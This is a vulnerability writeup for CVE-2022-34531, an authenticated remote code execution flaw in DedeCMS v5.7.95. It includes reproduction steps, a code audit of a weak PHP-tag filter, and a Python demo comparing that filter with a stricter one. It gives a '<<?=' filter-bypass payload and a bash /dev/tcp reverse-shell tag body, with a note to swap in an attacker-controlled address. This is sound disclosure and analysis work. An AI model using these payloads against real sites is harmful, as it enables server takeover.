CVE-2022-34531: vuls/DedeCMS-v5.7.95-RCE.md at main · Airrudder/vuls
DedeCMS v5.7.95 was discovered to contain a remote code execution (RCE) vulnerability via the component dede/mytag_main.php.
DedeCMS v5.7.95 RCE
DedeCMS official download page: https://www.dedecms.com/download
Vulnerability description
The admin backend of DedeCMS v5.7.95 has an arbitrary command execution vulnerability: an authenticated backend user can store a tag whose body contains PHP code, and that code is written to a file and executed, resulting in RCE.
Vulnerability impact
DedeCMS v5.7.95
Reproduction process
First visit /dede and log in to the admin backend.
Visit dede/mytag_main.php and add a new tag. The tag body used is shown as a screenshot in the original repository (not reproduced here); it contains PHP code written in the form explained in the Code audit section below.
In PHP the backtick operator (`) is equivalent to calling shell_exec(), so anything placed between backticks is run by the system shell.
Click "OK"; the new tag is assigned an ID, which is 3 in this case. Then visit /plus/mytag_js.php?arcID=3&nocache=1, where arcID=3 is the tag ID and nocache=1 forces the cache file to be regenerated. The tag body is written to a cache file, which is included immediately afterwards, so the PHP code in it is executed.
The same route can be used to obtain a reverse shell. Tag body (127.0.0.1:2333 is the author's local listener; replace it with an address you control):

```php
<<?=`bash -i &>/dev/tcp/127.0.0.1/2333 <&1`;?>
```

Start a listener with ncat on port 2333 (shown as a screenshot in the original).
Visit /plus/mytag_js.php?arcID=3&nocache=1 again and the reverse shell connects back to the listener.
Code audit
The vulnerable code is in plus/mytag_js.php: the tag body is written to a cache file, and that file is included directly afterwards. The file name does not matter for the attack (it always ends in .htm); what matters is the content of myvalues at the time the file is written.
The value of myvalues comes from a database query:

```sql
SELECT * FROM `#@__mytag` WHERE aid='$aid'
```

A global search for the `#@__mytag` table leads to dede/mytag_add.php and dede/mytag_edit.php, which insert into and update that table. Both are reached from dede/mytag_main.php, which provides the add and edit actions.
plus/mytag_js.php filters many dangerous function names, but the backtick operator (`) is not filtered, and the check for PHP open tags only rejects bodies that match the pattern `[^<]+<\?(php|=)` (case-insensitive). That pattern requires at least one character other than < immediately before <?, so:

```
// matched:     abcde<?php `ls`;?> <?=`ls`;?>
// not matched: <<?=`ls`?>
```

Prefixing the open tag with a second < (i.e. writing <<?=) defeats the check. When the cache file is included, PHP outputs the leading < as literal text and then enters PHP mode at <?=, so the backtick command is executed and RCE succeeds.
See the reproduction process above for the concrete exploitation steps.
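The following is an added example, not code from the original writeup or from DedeCMS. It models the filter described above (the PHP preg pattern `#[^<]+<\?(php|=)#i`, which Python's `re` interprets identically), runs it against the sample bodies from the writeup plus the reverse-shell payload, and contrasts it with a stricter check (my suggestion, not a DedeCMS patch) that flags a PHP open tag wherever it appears. It also splits a body into the code segments PHP would execute once the cache file is included, which shows why the extra leading `<` is harmless to the attacker. The sample bodies are constructed for the demonstration.

```python
import re

# Weak check as described in the writeup for plus/mytag_js.php: a PHP open tag
# is only rejected when at least one non-'<' character precedes it.
WEAK_FILTER = re.compile(r"[^<]+<\?(php|=)", re.IGNORECASE)

# Stricter check (assumption/suggestion, not DedeCMS code): reject any
# "<?php" or "<?=" regardless of what precedes it.
STRICT_FILTER = re.compile(r"<\?(php\b|=)", re.IGNORECASE)

# Open tag as the PHP lexer would recognise it (used by php_code_segments).
PHP_OPEN = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed sample tag bodies: the three from the writeup and the reverse-shell payload.
SAMPLES = {
    "prefixed php tag": "abcde<?php `ls`;?>",
    "short echo tag after text": "text <?=`ls`;?>",
    "double-angle bypass": "<<?=`ls`?>",
    "reverse shell payload": "<<?=`bash -i &>/dev/tcp/127.0.0.1/2333 <&1`;?>",
}


def weak_filter_blocks(body: str) -> bool:
    """True if the writeup's pattern would flag this body."""
    return WEAK_FILTER.search(body) is not None


def strict_filter_blocks(body: str) -> bool:
    """True if the hardened pattern would flag this body."""
    return STRICT_FILTER.search(body) is not None


def php_code_segments(body: str) -> list:
    """Return the code inside each <?php ... ?> / <?= ... ?> block, i.e. what PHP
    executes when the cache file is include()d. Text outside the tags (such as
    the leading '<' of the bypass) is emitted as literal output, not executed."""
    segments = []
    pos = 0
    while True:
        m = PHP_OPEN.search(body, pos)
        if not m:
            break
        end = body.find("?>", m.end())
        code = body[m.end():] if end == -1 else body[m.end():end]
        segments.append(code.strip())
        if end == -1:  # unterminated block runs to end of file
            break
        pos = end + 2
    return segments


def evaluate(samples=None) -> dict:
    """Map sample name -> (blocked by weak filter, blocked by strict filter)."""
    samples = SAMPLES if samples is None else samples
    return {name: (weak_filter_blocks(b), strict_filter_blocks(b))
            for name, b in samples.items()}


if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name:28s} weak={weak!s:5s} strict={strict!s:5s} "
              f"executes={php_code_segments(SAMPLES[name])}")
```

Running it shows the two prefixed bodies are caught by both checks, while both `<<?=` bodies slip past the weak check yet still yield an executable segment (the backtick command), which the strict check catches. The hardening here is only the regex; a real fix should also stop including user-controlled content as PHP at all.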